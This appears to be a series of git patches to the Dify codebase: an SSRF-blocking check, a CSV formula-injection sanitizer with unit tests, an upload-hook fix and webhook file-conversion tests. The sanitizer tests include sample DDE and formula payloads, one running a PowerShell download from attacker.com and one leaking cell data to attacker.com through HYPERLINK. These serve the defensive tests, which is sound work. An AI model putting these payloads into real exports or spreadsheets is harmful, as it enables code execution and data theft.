b/web/app/components/billing/pricing/plans/cloud-plan-item/list/item/tooltip.tsx index 84e0282993..cf6517b292 100644 --- a/web/app/components/billing/pricing/plans/cloud-plan-item/list/item/tooltip.tsx +++ b/web/app/components/billing/pricing/plans/cloud-plan-item/list/item/tooltip.tsx @@ -8,13 +8,15 @@ type TooltipProps = { const Tooltip = ({ content, }: TooltipProps) => { + if (!content) + return null return (
{content}
- +
) From 2bf44057e95e4660bf5260ea58143546272db919 Mon Sep 17 00:00:00 2001 From: zyssyz123 <916125788@qq.com> Date: Mon, 15 Dec 2025 16:28:25 +0800 Subject: [PATCH 06/16] fix: ssrf, add internal ip filter when parse tool schema (#29548) Co-authored-by: gemini-code-assist[bot] <176961590+gemini-code-assist[bot]@users.noreply.github.com> Co-authored-by: autofix-ci[bot] <114827586+autofix-ci[bot]@users.noreply.github.com> Co-authored-by: Yeuoly <45712896+Yeuoly@users.noreply.github.com> --- api/core/helper/ssrf_proxy.py | 13 +++++++++++++ api/core/tools/errors.py | 4 ++++ api/core/tools/utils/parser.py | 3 +-- 3 files changed, 18 insertions(+), 2 deletions(-) diff --git a/api/core/helper/ssrf_proxy.py b/api/core/helper/ssrf_proxy.py index 0de026f3c7..6c98aea1be 100644 --- a/api/core/helper/ssrf_proxy.py +++ b/api/core/helper/ssrf_proxy.py @@ -9,6 +9,7 @@ import httpx from configs import dify_config from core.helper.http_client_pooling import get_pooled_http_client +from core.tools.errors import ToolSSRFError logger = logging.getLogger(__name__) @@ -93,6 +94,18 @@ def make_request(method, url, max_retries=SSRF_DEFAULT_MAX_RETRIES, **kwargs): while retries <= max_retries: try: response = client.request(method=method, url=url, **kwargs) + # Check for SSRF protection by Squid proxy + if response.status_code in (401, 403): + # Check if this is a Squid SSRF rejection + server_header = response.headers.get("server", "").lower() + via_header = response.headers.get("via", "").lower() + + # Squid typically identifies itself in Server or Via headers + if "squid" in server_header or "squid" in via_header: + raise ToolSSRFError( + f"Access to '{url}' was blocked by SSRF protection. " + f"The URL may point to a private or local network address. " + ) if response.status_code not in STATUS_FORCELIST: return response diff --git a/api/core/tools/errors.py b/api/core/tools/errors.py index b0c2232857..e4afe24426 100644 --- a/api/core/tools/errors.py +++ b/api/core/tools/errors.py @@ -29,6 +29,10 @@ class ToolApiSchemaError(ValueError): pass +class ToolSSRFError(ValueError): + pass + + class ToolCredentialPolicyViolationError(ValueError): pass diff --git a/api/core/tools/utils/parser.py b/api/core/tools/utils/parser.py index 6eabde3991..3486182192 100644 --- a/api/core/tools/utils/parser.py +++ b/api/core/tools/utils/parser.py @@ -425,7 +425,7 @@ class ApiBasedToolSchemaParser: except ToolApiSchemaError as e: openapi_error = e - # openai parse error, fallback to swagger + # openapi parse error, fallback to swagger try: converted_swagger = ApiBasedToolSchemaParser.parse_swagger_to_openapi( loaded_content, extra_info=extra_info, warning=warning @@ -436,7 +436,6 @@ class ApiBasedToolSchemaParser: ), schema_type except ToolApiSchemaError as e: swagger_error = e - # swagger parse error, fallback to openai plugin try: openapi_plugin = ApiBasedToolSchemaParser.parse_openai_plugin_json_to_tool_bundle( From bd7b1fc6fbb648f6bf6c6006230262c77029c896 Mon Sep 17 00:00:00 2001 From: zyssyz123 <916125788@qq.com> Date: Mon, 15 Dec 2025 17:14:05 +0800 Subject: [PATCH 07/16] fix: csv injection in annotations export (#29462) Co-authored-by: hj24 Co-authored-by: autofix-ci[bot] <114827586+autofix-ci[bot]@users.noreply.github.com> --- api/controllers/console/app/annotation.py | 14 +- api/core/helper/csv_sanitizer.py | 89 +++++++++++ api/services/annotation_service.py | 17 ++ .../console/app/test_annotation_security.py | 7 +- .../core/helper/test_csv_sanitizer.py | 151 ++++++++++++++++++ 5 files changed, 271 insertions(+), 7 deletions(-) create mode 100644 api/core/helper/csv_sanitizer.py create mode 100644 api/tests/unit_tests/core/helper/test_csv_sanitizer.py diff --git a/api/controllers/console/app/annotation.py b/api/controllers/console/app/annotation.py index 0aed36a7fd..6a4c1528b0 100644 --- a/api/controllers/console/app/annotation.py +++ b/api/controllers/console/app/annotation.py @@ -1,6 +1,6 @@ from typing import Any, Literal -from flask import abort, request +from flask import abort, make_response, request from flask_restx import Resource, fields, marshal, marshal_with from pydantic import BaseModel, Field, field_validator @@ -259,7 +259,7 @@ class AnnotationApi(Resource): @console_ns.route("/apps//annotations/export") class AnnotationExportApi(Resource): @console_ns.doc("export_annotations") - @console_ns.doc(description="Export all annotations for an app") + @console_ns.doc(description="Export all annotations for an app with CSV injection protection") @console_ns.doc(params={"app_id": "Application ID"}) @console_ns.response( 200, @@ -274,8 +274,14 @@ class AnnotationExportApi(Resource): def get(self, app_id): app_id = str(app_id) annotation_list = AppAnnotationService.export_annotation_list_by_app_id(app_id) - response = {"data": marshal(annotation_list, annotation_fields)} - return response, 200 + response_data = {"data": marshal(annotation_list, annotation_fields)} + + # Create response with secure headers for CSV export + response = make_response(response_data, 200) + response.headers["Content-Type"] = "application/json; charset=utf-8" + response.headers["X-Content-Type-Options"] = "nosniff" + + return response @console_ns.route("/apps//annotations/") diff --git a/api/core/helper/csv_sanitizer.py b/api/core/helper/csv_sanitizer.py new file mode 100644 index 0000000000..0023de5a35 --- /dev/null +++ b/api/core/helper/csv_sanitizer.py @@ -0,0 +1,89 @@ +"""CSV sanitization utilities to prevent formula injection attacks.""" + +from typing import Any + + +class CSVSanitizer: + """ + Sanitizer for CSV export to prevent formula injection attacks. + + This class provides methods to sanitize data before CSV export by escaping + characters that could be interpreted as formulas by spreadsheet applications + (Excel, LibreOffice, Google Sheets). + + Formula injection occurs when user-controlled data starting with special + characters (=, +, -, @, tab, carriage return) is exported to CSV and opened + in a spreadsheet application, potentially executing malicious commands. + """ + + # Characters that can start a formula in Excel/LibreOffice/Google Sheets + FORMULA_CHARS = frozenset({"=", "+", "-", "@", "\t", "\r"}) + + @classmethod + def sanitize_value(cls, value: Any) -> str: + """ + Sanitize a value for safe CSV export. + + Prefixes formula-initiating characters with a single quote to prevent + Excel/LibreOffice/Google Sheets from treating them as formulas. + + Args: + value: The value to sanitize (will be converted to string) + + Returns: + Sanitized string safe for CSV export + + Examples: + >>> CSVSanitizer.sanitize_value("=1+1") + "'=1+1" + >>> CSVSanitizer.sanitize_value("Hello World") + "Hello World" + >>> CSVSanitizer.sanitize_value(None) + "" + """ + if value is None: + return "" + + # Convert to string + str_value = str(value) + + # If empty, return as is + if not str_value: + return "" + + # Check if first character is a formula initiator + if str_value[0] in cls.FORMULA_CHARS: + # Prefix with single quote to escape + return f"'{str_value}" + + return str_value + + @classmethod + def sanitize_dict(cls, data: dict[str, Any], fields_to_sanitize: list[str] | None = None) -> dict[str, Any]: + """ + Sanitize specified fields in a dictionary. + + Args: + data: Dictionary containing data to sanitize + fields_to_sanitize: List of field names to sanitize. + If None, sanitizes all string fields. + + Returns: + Dictionary with sanitized values (creates a shallow copy) + + Examples: + >>> data = {"question": "=1+1", "answer": "+calc", "id": "123"} + >>> CSVSanitizer.sanitize_dict(data, ["question", "answer"]) + {"question": "'=1+1", "answer": "'+calc", "id": "123"} + """ + sanitized = data.copy() + + if fields_to_sanitize is None: + # Sanitize all string fields + fields_to_sanitize = [k for k, v in data.items() if isinstance(v, str)] + + for field in fields_to_sanitize: + if field in sanitized: + sanitized[field] = cls.sanitize_value(sanitized[field]) + + return sanitized diff --git a/api/services/annotation_service.py b/api/services/annotation_service.py index f750186ab0..d03cbddceb 100644 --- a/api/services/annotation_service.py +++ b/api/services/annotation_service.py @@ -8,6 +8,7 @@ from sqlalchemy import or_, select from werkzeug.datastructures import FileStorage from werkzeug.exceptions import NotFound +from core.helper.csv_sanitizer import CSVSanitizer from extensions.ext_database import db from extensions.ext_redis import redis_client from libs.datetime_utils import naive_utc_now @@ -158,6 +159,12 @@ class AppAnnotationService: @classmethod def export_annotation_list_by_app_id(cls, app_id: str): + """ + Export all annotations for an app with CSV injection protection. + + Sanitizes question and content fields to prevent formula injection attacks + when exported to CSV format. + """ # get app info _, current_tenant_id = current_account_with_tenant() app = ( @@ -174,6 +181,16 @@ class AppAnnotationService: .order_by(MessageAnnotation.created_at.desc()) .all() ) + + # Sanitize CSV-injectable fields to prevent formula injection + for annotation in annotations: + # Sanitize question field if present + if annotation.question: + annotation.question = CSVSanitizer.sanitize_value(annotation.question) + # Sanitize content field (answer) + if annotation.content: + annotation.content = CSVSanitizer.sanitize_value(annotation.content) + return annotations @classmethod diff --git a/api/tests/unit_tests/controllers/console/app/test_annotation_security.py b/api/tests/unit_tests/controllers/console/app/test_annotation_security.py index 36da3c264e..11d12792c9 100644 --- a/api/tests/unit_tests/controllers/console/app/test_annotation_security.py +++ b/api/tests/unit_tests/controllers/console/app/test_annotation_security.py @@ -250,8 +250,8 @@ class TestAnnotationImportServiceValidation: """Test that invalid CSV format is handled gracefully.""" from services.annotation_service import AppAnnotationService - # Create invalid CSV content - csv_content = 'invalid,csv,format\nwith,unbalanced,quotes,and"stuff' + # Create CSV with only one column (should require at least 2 columns for question and answer) + csv_content = "single_column_header\nonly_one_value" file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv") @@ -262,8 +262,9 @@ class TestAnnotationImportServiceValidation: result = AppAnnotationService.batch_import_app_annotations("app_id", file) - # Should return error message + # Should return error message about invalid format (less than 2 columns) assert "error_msg" in result + assert "at least 2 columns" in result["error_msg"].lower() def test_valid_import_succeeds(self, mock_app, mock_db_session): """Test that valid import request succeeds.""" diff --git a/api/tests/unit_tests/core/helper/test_csv_sanitizer.py b/api/tests/unit_tests/core/helper/test_csv_sanitizer.py new file mode 100644 index 0000000000..443c2824d5 --- /dev/null +++ b/api/tests/unit_tests/core/helper/test_csv_sanitizer.py @@ -0,0 +1,151 @@ +"""Unit tests for CSV sanitizer.""" + +from core.helper.csv_sanitizer import CSVSanitizer + + +class TestCSVSanitizer: + """Test cases for CSV sanitization to prevent formula injection attacks.""" + + def test_sanitize_formula_equals(self): + """Test sanitizing values starting with = (most common formula injection).""" + assert CSVSanitizer.sanitize_value("=cmd|'/c calc'!A0") == "'=cmd|'/c calc'!A0" + assert CSVSanitizer.sanitize_value("=SUM(A1:A10)") == "'=SUM(A1:A10)" + assert CSVSanitizer.sanitize_value("=1+1") == "'=1+1" + assert CSVSanitizer.sanitize_value("=@SUM(1+1)") == "'=@SUM(1+1)" + + def test_sanitize_formula_plus(self): + """Test sanitizing values starting with + (plus formula injection).""" + assert CSVSanitizer.sanitize_value("+1+1+cmd|'/c calc") == "'+1+1+cmd|'/c calc" + assert CSVSanitizer.sanitize_value("+123") == "'+123" + assert CSVSanitizer.sanitize_value("+cmd|'/c calc'!A0") == "'+cmd|'/c calc'!A0" + + def test_sanitize_formula_minus(self): + """Test sanitizing values starting with - (minus formula injection).""" + assert CSVSanitizer.sanitize_value("-2+3+cmd|'/c calc") == "'-2+3+cmd|'/c calc" + assert CSVSanitizer.sanitize_value("-456") == "'-456" + assert CSVSanitizer.sanitize_value("-cmd|'/c notepad") == "'-cmd|'/c notepad" + + def test_sanitize_formula_at(self): + """Test sanitizing values starting with @ (at-sign formula injection).""" + assert CSVSanitizer.sanitize_value("@SUM(1+1)*cmd|'/c calc") == "'@SUM(1+1)*cmd|'/c calc" + assert CSVSanitizer.sanitize_value("@AVERAGE(1,2,3)") == "'@AVERAGE(1,2,3)" + + def test_sanitize_formula_tab(self): + """Test sanitizing values starting with tab character.""" + assert CSVSanitizer.sanitize_value("\t=1+1") == "'\t=1+1" + assert CSVSanitizer.sanitize_value("\tcalc") == "'\tcalc" + + def test_sanitize_formula_carriage_return(self): + """Test sanitizing values starting with carriage return.""" + assert CSVSanitizer.sanitize_value("\r=1+1") == "'\r=1+1" + assert CSVSanitizer.sanitize_value("\rcmd") == "'\rcmd" + + def test_sanitize_safe_values(self): + """Test that safe values are not modified.""" + assert CSVSanitizer.sanitize_value("Hello World") == "Hello World" + assert CSVSanitizer.sanitize_value("123") == "123" + assert CSVSanitizer.sanitize_value("test@example.com") == "test@example.com" + assert CSVSanitizer.sanitize_value("Normal text") == "Normal text" + assert CSVSanitizer.sanitize_value("Question: How are you?") == "Question: How are you?" + + def test_sanitize_safe_values_with_special_chars_in_middle(self): + """Test that special characters in the middle are not escaped.""" + assert CSVSanitizer.sanitize_value("A = B + C") == "A = B + C" + assert CSVSanitizer.sanitize_value("Price: $10 + $20") == "Price: $10 + $20" + assert CSVSanitizer.sanitize_value("Email: user@domain.com") == "Email: user@domain.com" + + def test_sanitize_empty_values(self): + """Test handling of empty values.""" + assert CSVSanitizer.sanitize_value("") == "" + assert CSVSanitizer.sanitize_value(None) == "" + + def test_sanitize_numeric_types(self): + """Test handling of numeric types.""" + assert CSVSanitizer.sanitize_value(123) == "123" + assert CSVSanitizer.sanitize_value(456.789) == "456.789" + assert CSVSanitizer.sanitize_value(0) == "0" + # Negative numbers should be escaped (start with -) + assert CSVSanitizer.sanitize_value(-123) == "'-123" + + def test_sanitize_boolean_types(self): + """Test handling of boolean types.""" + assert CSVSanitizer.sanitize_value(True) == "True" + assert CSVSanitizer.sanitize_value(False) == "False" + + def test_sanitize_dict_with_specific_fields(self): + """Test sanitizing specific fields in a dictionary.""" + data = { + "question": "=1+1", + "answer": "+cmd|'/c calc", + "safe_field": "Normal text", + "id": "12345", + } + sanitized = CSVSanitizer.sanitize_dict(data, ["question", "answer"]) + + assert sanitized["question"] == "'=1+1" + assert sanitized["answer"] == "'+cmd|'/c calc" + assert sanitized["safe_field"] == "Normal text" + assert sanitized["id"] == "12345" + + def test_sanitize_dict_all_string_fields(self): + """Test sanitizing all string fields when no field list provided.""" + data = { + "question": "=1+1", + "answer": "+calc", + "id": 123, # Not a string, should be ignored + } + sanitized = CSVSanitizer.sanitize_dict(data, None) + + assert sanitized["question"] == "'=1+1" + assert sanitized["answer"] == "'+calc" + assert sanitized["id"] == 123 # Unchanged + + def test_sanitize_dict_with_missing_fields(self): + """Test that missing fields in dict don't cause errors.""" + data = {"question": "=1+1"} + sanitized = CSVSanitizer.sanitize_dict(data, ["question", "nonexistent_field"]) + + assert sanitized["question"] == "'=1+1" + assert "nonexistent_field" not in sanitized + + def test_sanitize_dict_creates_copy(self): + """Test that sanitize_dict creates a copy and doesn't modify original.""" + original = {"question": "=1+1", "answer": "Normal"} + sanitized = CSVSanitizer.sanitize_dict(original, ["question"]) + + assert original["question"] == "=1+1" # Original unchanged + assert sanitized["question"] == "'=1+1" # Copy sanitized + + def test_real_world_csv_injection_payloads(self): + """Test against real-world CSV injection attack payloads.""" + # Common DDE (Dynamic Data Exchange) attack payloads + payloads = [ + "=cmd|'/c calc'!A0", + "=cmd|'/c notepad'!A0", + "+cmd|'/c powershell IEX(wget attacker.com/malware.ps1)'", + "-2+3+cmd|'/c calc'", + "@SUM(1+1)*cmd|'/c calc'", + "=1+1+cmd|'/c calc'", + '=HYPERLINK("http://attacker.com?leak="&A1&A2,"Click here")', + ] + + for payload in payloads: + result = CSVSanitizer.sanitize_value(payload) + # All should be prefixed with single quote + assert result.startswith("'"), f"Payload not sanitized: {payload}" + assert result == f"'{payload}", f"Unexpected sanitization for: {payload}" + + def test_multiline_strings(self): + """Test handling of multiline strings.""" + multiline = "Line 1\nLine 2\nLine 3" + assert CSVSanitizer.sanitize_value(multiline) == multiline + + multiline_with_formula = "=SUM(A1)\nLine 2" + assert CSVSanitizer.sanitize_value(multiline_with_formula) == f"'{multiline_with_formula}" + + def test_whitespace_only_strings(self): + """Test handling of whitespace-only strings.""" + assert CSVSanitizer.sanitize_value(" ") == " " + assert CSVSanitizer.sanitize_value("\n\n") == "\n\n" + # Tab at start should be escaped + assert CSVSanitizer.sanitize_value("\t ") == "'\t " From a8f3061b3c9350e1570979794e5cb521dd60a2da Mon Sep 17 00:00:00 2001 From: Joel Date: Mon, 15 Dec 2025 18:02:34 +0800 Subject: [PATCH 08/16] fix: all upload files are disabled if upload file feature disabled (#29681) --- web/app/components/base/chat/chat/chat-input-area/index.tsx | 2 +- web/app/components/base/file-uploader/hooks.ts | 6 +++--- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/web/app/components/base/chat/chat/chat-input-area/index.tsx b/web/app/components/base/chat/chat/chat-input-area/index.tsx index 7d08b84b8e..5004bb2a92 100644 --- a/web/app/components/base/chat/chat/chat-input-area/index.tsx +++ b/web/app/components/base/chat/chat/chat-input-area/index.tsx @@ -79,7 +79,7 @@ const ChatInputArea = ({ handleDropFile, handleClipboardPasteFile, isDragActive, - } = useFile(visionConfig!) + } = useFile(visionConfig!, false) const { checkInputsForm } = useCheckInputsForms() const historyRef = useRef(['']) const [currentIndex, setCurrentIndex] = useState(-1) diff --git a/web/app/components/base/file-uploader/hooks.ts b/web/app/components/base/file-uploader/hooks.ts index baef5ff7d8..2e72574cfb 100644 --- a/web/app/components/base/file-uploader/hooks.ts +++ b/web/app/components/base/file-uploader/hooks.ts @@ -47,7 +47,7 @@ export const useFileSizeLimit = (fileUploadConfig?: FileUploadConfigResponse) => } } -export const useFile = (fileConfig: FileUpload) => { +export const useFile = (fileConfig: FileUpload, noNeedToCheckEnable = true) => { const { t } = useTranslation() const { notify } = useToastContext() const fileStore = useFileStore() @@ -247,7 +247,7 @@ export const useFile = (fileConfig: FileUpload) => { const handleLocalFileUpload = useCallback((file: File) => { // Check file upload enabled - if (!fileConfig.enabled) { + if (!noNeedToCheckEnable && !fileConfig.enabled) { notify({ type: 'error', message: t('common.fileUploader.uploadDisabled') }) return } @@ -303,7 +303,7 @@ export const useFile = (fileConfig: FileUpload) => { false, ) reader.readAsDataURL(file) - }, [checkSizeLimit, notify, t, handleAddFile, handleUpdateFile, params.token, fileConfig?.allowed_file_types, fileConfig?.allowed_file_extensions, fileConfig?.enabled]) + }, [noNeedToCheckEnable, checkSizeLimit, notify, t, handleAddFile, handleUpdateFile, params.token, fileConfig?.allowed_file_types, fileConfig?.allowed_file_extensions, fileConfig?.enabled]) const handleClipboardPasteFile = useCallback((e: ClipboardEvent) => { const file = e.clipboardData?.files[0] From 09982a1c95e1ce65981cfeef2c6da852b74678a2 Mon Sep 17 00:00:00 2001 From: wangxiaolei Date: Mon, 15 Dec 2025 19:55:59 +0800 Subject: [PATCH 09/16] fix: webhook node output file as file variable (#29621) --- .../workflow/nodes/trigger_webhook/node.py | 59 ++- api/factories/file_factory.py | 17 +- .../services/test_webhook_service.py | 6 +- .../console/app/test_annotation_security.py | 14 +- .../webhook/test_webhook_file_conversion.py | 452 ++++++++++++++++++ .../nodes/webhook/test_webhook_node.py | 75 ++- .../services/test_webhook_service.py | 6 +- 7 files changed, 585 insertions(+), 44 deletions(-) create mode 100644 api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_file_conversion.py diff --git a/api/core/workflow/nodes/trigger_webhook/node.py b/api/core/workflow/nodes/trigger_webhook/node.py index 3631c8653d..ec8c4b8ee3 100644 --- a/api/core/workflow/nodes/trigger_webhook/node.py +++ b/api/core/workflow/nodes/trigger_webhook/node.py @@ -1,14 +1,22 @@ +import logging from collections.abc import Mapping from typing import Any +from core.file import FileTransferMethod +from core.variables.types import SegmentType +from core.variables.variables import FileVariable from core.workflow.constants import SYSTEM_VARIABLE_NODE_ID from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionStatus from core.workflow.enums import NodeExecutionType, NodeType from core.workflow.node_events import NodeRunResult from core.workflow.nodes.base.node import Node +from factories import file_factory +from factories.variable_factory import build_segment_with_type from .entities import ContentType, WebhookData +logger = logging.getLogger(__name__) + class TriggerWebhookNode(Node[WebhookData]): node_type = NodeType.TRIGGER_WEBHOOK @@ -60,6 +68,34 @@ class TriggerWebhookNode(Node[WebhookData]): outputs=outputs, ) + def generate_file_var(self, param_name: str, file: dict): + related_id = file.get("related_id") + transfer_method_value = file.get("transfer_method") + if transfer_method_value: + transfer_method = FileTransferMethod.value_of(transfer_method_value) + match transfer_method: + case FileTransferMethod.LOCAL_FILE | FileTransferMethod.REMOTE_URL: + file["upload_file_id"] = related_id + case FileTransferMethod.TOOL_FILE: + file["tool_file_id"] = related_id + case FileTransferMethod.DATASOURCE_FILE: + file["datasource_file_id"] = related_id + + try: + file_obj = file_factory.build_from_mapping( + mapping=file, + tenant_id=self.tenant_id, + ) + file_segment = build_segment_with_type(SegmentType.FILE, file_obj) + return FileVariable(name=param_name, value=file_segment.value, selector=[self.id, param_name]) + except ValueError: + logger.error( + "Failed to build FileVariable for webhook file parameter %s", + param_name, + exc_info=True, + ) + return None + def _extract_configured_outputs(self, webhook_inputs: dict[str, Any]) -> dict[str, Any]: """Extract outputs based on node configuration from webhook inputs.""" outputs = {} @@ -107,18 +143,33 @@ class TriggerWebhookNode(Node[WebhookData]): outputs[param_name] = str(webhook_data.get("body", {}).get("raw", "")) continue elif self.node_data.content_type == ContentType.BINARY: - outputs[param_name] = webhook_data.get("body", {}).get("raw", b"") + raw_data: dict = webhook_data.get("body", {}).get("raw", {}) + file_var = self.generate_file_var(param_name, raw_data) + if file_var: + outputs[param_name] = file_var + else: + outputs[param_name] = raw_data continue if param_type == "file": # Get File object (already processed by webhook controller) - file_obj = webhook_data.get("files", {}).get(param_name) - outputs[param_name] = file_obj + files = webhook_data.get("files", {}) + if files and isinstance(files, dict): + file = files.get(param_name) + if file and isinstance(file, dict): + file_var = self.generate_file_var(param_name, file) + if file_var: + outputs[param_name] = file_var + else: + outputs[param_name] = files + else: + outputs[param_name] = files + else: + outputs[param_name] = files else: # Get regular body parameter outputs[param_name] = webhook_data.get("body", {}).get(param_name) # Include raw webhook data for debugging/advanced use outputs["_webhook_raw"] = webhook_data - return outputs diff --git a/api/factories/file_factory.py b/api/factories/file_factory.py index 737a79f2b0..bd71f18af2 100644 --- a/api/factories/file_factory.py +++ b/api/factories/file_factory.py @@ -1,3 +1,4 @@ +import logging import mimetypes import os import re @@ -17,6 +18,8 @@ from core.helper import ssrf_proxy from extensions.ext_database import db from models import MessageFile, ToolFile, UploadFile +logger = logging.getLogger(__name__) + def build_from_message_files( *, @@ -356,15 +359,20 @@ def _build_from_tool_file( transfer_method: FileTransferMethod, strict_type_validation: bool = False, ) -> File: + # Backward/interop compatibility: allow tool_file_id to come from related_id or URL + tool_file_id = mapping.get("tool_file_id") + + if not tool_file_id: + raise ValueError(f"ToolFile {tool_file_id} not found") tool_file = db.session.scalar( select(ToolFile).where( - ToolFile.id == mapping.get("tool_file_id"), + ToolFile.id == tool_file_id, ToolFile.tenant_id == tenant_id, ) ) if tool_file is None: - raise ValueError(f"ToolFile {mapping.get('tool_file_id')} not found") + raise ValueError(f"ToolFile {tool_file_id} not found") extension = "." + tool_file.file_key.split(".")[-1] if "." in tool_file.file_key else ".bin" @@ -402,10 +410,13 @@ def _build_from_datasource_file( transfer_method: FileTransferMethod, strict_type_validation: bool = False, ) -> File: + datasource_file_id = mapping.get("datasource_file_id") + if not datasource_file_id: + raise ValueError(f"DatasourceFile {datasource_file_id} not found") datasource_file = ( db.session.query(UploadFile) .where( - UploadFile.id == mapping.get("datasource_file_id"), + UploadFile.id == datasource_file_id, UploadFile.tenant_id == tenant_id, ) .first() diff --git a/api/tests/test_containers_integration_tests/services/test_webhook_service.py b/api/tests/test_containers_integration_tests/services/test_webhook_service.py index 8328db950c..e3431fd382 100644 --- a/api/tests/test_containers_integration_tests/services/test_webhook_service.py +++ b/api/tests/test_containers_integration_tests/services/test_webhook_service.py @@ -233,7 +233,7 @@ class TestWebhookService: "/webhook", method="POST", headers={"Content-Type": "multipart/form-data"}, - data={"message": "test", "upload": file_storage}, + data={"message": "test", "file": file_storage}, ): webhook_trigger = MagicMock() webhook_trigger.tenant_id = "test_tenant" @@ -242,7 +242,7 @@ class TestWebhookService: assert webhook_data["method"] == "POST" assert webhook_data["body"]["message"] == "test" - assert "upload" in webhook_data["files"] + assert "file" in webhook_data["files"] # Verify file processing was called mock_external_dependencies["tool_file_manager"].assert_called_once() @@ -414,7 +414,7 @@ class TestWebhookService: "data": { "method": "post", "content_type": "multipart/form-data", - "body": [{"name": "upload", "type": "file", "required": True}], + "body": [{"name": "file", "type": "file", "required": True}], } } diff --git a/api/tests/unit_tests/controllers/console/app/test_annotation_security.py b/api/tests/unit_tests/controllers/console/app/test_annotation_security.py index 11d12792c9..06a7b98baf 100644 --- a/api/tests/unit_tests/controllers/console/app/test_annotation_security.py +++ b/api/tests/unit_tests/controllers/console/app/test_annotation_security.py @@ -9,6 +9,7 @@ import io from unittest.mock import MagicMock, patch import pytest +from pandas.errors import ParserError from werkzeug.datastructures import FileStorage from configs import dify_config @@ -250,21 +251,22 @@ class TestAnnotationImportServiceValidation: """Test that invalid CSV format is handled gracefully.""" from services.annotation_service import AppAnnotationService - # Create CSV with only one column (should require at least 2 columns for question and answer) - csv_content = "single_column_header\nonly_one_value" - + # Any content is fine once we force ParserError + csv_content = 'invalid,csv,format\nwith,unbalanced,quotes,and"stuff' file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv") mock_db_session.query.return_value.where.return_value.first.return_value = mock_app - with patch("services.annotation_service.current_account_with_tenant") as mock_auth: + with ( + patch("services.annotation_service.current_account_with_tenant") as mock_auth, + patch("services.annotation_service.pd.read_csv", side_effect=ParserError("malformed CSV")), + ): mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id") result = AppAnnotationService.batch_import_app_annotations("app_id", file) - # Should return error message about invalid format (less than 2 columns) assert "error_msg" in result - assert "at least 2 columns" in result["error_msg"].lower() + assert "malformed" in result["error_msg"].lower() def test_valid_import_succeeds(self, mock_app, mock_db_session): """Test that valid import request succeeds.""" diff --git a/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_file_conversion.py b/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_file_conversion.py new file mode 100644 index 0000000000..ead2334473 --- /dev/null +++ b/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_file_conversion.py @@ -0,0 +1,452 @@ +""" +Unit tests for webhook file conversion fix. + +This test verifies that webhook trigger nodes properly convert file dictionaries +to FileVariable objects, fixing the "Invalid variable type: ObjectVariable" error +when passing files to downstream LLM nodes. +""" + +from unittest.mock import Mock, patch + +from core.app.entities.app_invoke_entities import InvokeFrom +from core.workflow.entities.graph_init_params import GraphInitParams +from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionStatus +from core.workflow.nodes.trigger_webhook.entities import ( + ContentType, + Method, + WebhookBodyParameter, + WebhookData, +) +from core.workflow.nodes.trigger_webhook.node import TriggerWebhookNode +from core.workflow.runtime.graph_runtime_state import GraphRuntimeState +from core.workflow.runtime.variable_pool import VariablePool +from core.workflow.system_variable import SystemVariable +from models.enums import UserFrom +from models.workflow import WorkflowType + + +def create_webhook_node( + webhook_data: WebhookData, + variable_pool: VariablePool, + tenant_id: str = "test-tenant", +) -> TriggerWebhookNode: + """Helper function to create a webhook node with proper initialization.""" + node_config = { + "id": "webhook-node-1", + "data": webhook_data.model_dump(), + } + + graph_init_params = GraphInitParams( + tenant_id=tenant_id, + app_id="test-app", + workflow_type=WorkflowType.WORKFLOW, + workflow_id="test-workflow", + graph_config={}, + user_id="test-user", + user_from=UserFrom.ACCOUNT, + invoke_from=InvokeFrom.SERVICE_API, + call_depth=0, + ) + + runtime_state = GraphRuntimeState( + variable_pool=variable_pool, + start_at=0, + ) + + node = TriggerWebhookNode( + id="webhook-node-1", + config=node_config, + graph_init_params=graph_init_params, + graph_runtime_state=runtime_state, + ) + + # Attach a lightweight app_config onto runtime state for tenant lookups + runtime_state.app_config = Mock() + runtime_state.app_config.tenant_id = tenant_id + + # Provide compatibility alias expected by node implementation + # Some nodes reference `self.node_id`; expose it as an alias to `self.id` for tests + node.node_id = node.id + + return node + + +def create_test_file_dict( + filename: str = "test.jpg", + file_type: str = "image", + transfer_method: str = "local_file", +) -> dict: + """Create a test file dictionary as it would come from webhook service.""" + return { + "id": "file-123", + "tenant_id": "test-tenant", + "type": file_type, + "filename": filename, + "extension": ".jpg", + "mime_type": "image/jpeg", + "transfer_method": transfer_method, + "related_id": "related-123", + "storage_key": "storage-key-123", + "size": 1024, + "url": "https://example.com/test.jpg", + "created_at": 1234567890, + "used_at": None, + "hash": "file-hash-123", + } + + +def test_webhook_node_file_conversion_to_file_variable(): + """Test that webhook node converts file dictionaries to FileVariable objects.""" + # Create test file dictionary (as it comes from webhook service) + file_dict = create_test_file_dict("uploaded_image.jpg") + + data = WebhookData( + title="Test Webhook with File", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="image_upload", type="file", required=True), + WebhookBodyParameter(name="message", type="string", required=False), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {"message": "Test message"}, + "files": { + "image_upload": file_dict, + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + # Mock the file factory and variable factory + with ( + patch("factories.file_factory.build_from_mapping") as mock_file_factory, + patch("core.workflow.nodes.trigger_webhook.node.build_segment_with_type") as mock_segment_factory, + patch("core.workflow.nodes.trigger_webhook.node.FileVariable") as mock_file_variable, + ): + # Setup mocks + mock_file_obj = Mock() + mock_file_obj.to_dict.return_value = file_dict + mock_file_factory.return_value = mock_file_obj + + mock_segment = Mock() + mock_segment.value = mock_file_obj + mock_segment_factory.return_value = mock_segment + + mock_file_var_instance = Mock() + mock_file_variable.return_value = mock_file_var_instance + + # Run the node + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify file factory was called with correct parameters + mock_file_factory.assert_called_once_with( + mapping=file_dict, + tenant_id="test-tenant", + ) + + # Verify segment factory was called to create FileSegment + mock_segment_factory.assert_called_once() + + # Verify FileVariable was created with correct 